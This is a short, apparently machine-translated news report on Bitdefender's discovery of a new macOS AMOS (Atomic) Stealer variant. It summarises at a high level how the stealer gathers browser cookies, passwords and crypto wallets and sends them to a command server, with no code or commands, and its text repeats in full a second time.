The malware ably cleanses systems, laughing in the face of antivirus programs.
Bitdefender specialists have discovered a new version of the AMOS Stealer (or Atomic Stealer) malware, one of the most common cyber threats to macOS users over the past year. According to Bitdefender experts, the new variant was identified during the study of old and new samples of malware for macOS in order to improve the detection capabilities of such threats.
Suspicions were aroused by several small-sized (1.3 MB) disk images for macOS. A detailed analysis showed the similarity of the new version with RustDoor. Both options are designed to collect confidential files from infected computers, and the current one is a more advanced version of the RustDoor script.
The new version has additional features. It collects cookies.binarycookies from Safari browser cookies, files with specific extensions from specific locations, and uses the system_profiler utility to get system information.
In this way, attackers get information about the technical characteristics of the computer, OS versions, connected monitors and video cards. Passwords, encryption keys, and certificates are added to the archive, which indicates a growing interest in crypto platforms.
In this version, Python and Apple Scripting are combined in a non-standard way . The grabber() file executes a large Apple Script block using the osascript-e command. DMG files contain executable modules for Intel and ARM that are used for data theft.
When opened, the Crack Installer app prompts the user to unzip the file. The Python script collects confidential data from various sources, including crypto wallets, browsers, and accounts.
The collected data is saved in a ZIP archive and sent to the C2 server via a POST request. The archive structure is confirmed by the server.
At the moment, the new option is practically not detected by antivirus programs. Bitdefender has published compromise indicators to identify and neutralize this cyber threat.
Bitdefender specialists have discovered a new version of the AMOS Stealer (or Atomic Stealer) malware, one of the most common cyber threats to macOS users over the past year. According to Bitdefender experts, the new variant was identified during the study of old and new samples of malware for macOS in order to improve the detection capabilities of such threats.
Suspicions were aroused by several small-sized (1.3 MB) disk images for macOS. A detailed analysis showed the similarity of the new version with RustDoor. Both options are designed to collect confidential files from infected computers, and the current one is a more advanced version of the RustDoor script.
The new version has additional features. It collects cookies.binarycookies from Safari browser cookies, files with specific extensions from specific locations, and uses the system_profiler utility to get system information.
In this way, attackers get information about the technical characteristics of the computer, OS versions, connected monitors and video cards. Passwords, encryption keys, and certificates are added to the archive, which indicates a growing interest in crypto platforms.
In this version, Python and Apple Scripting are combined in a non-standard way . The grabber() file executes a large Apple Script block using the osascript-e command. DMG files contain executable modules for Intel and ARM that are used for data theft.
When opened, the Crack Installer app prompts the user to unzip the file. The Python script collects confidential data from various sources, including crypto wallets, browsers, and accounts.
The collected data is saved in a ZIP archive and sent to the C2 server via a POST request. The archive structure is confirmed by the server.
At the moment, the new option is practically not detected by antivirus programs. Bitdefender has published compromise indicators to identify and neutralize this cyber threat.
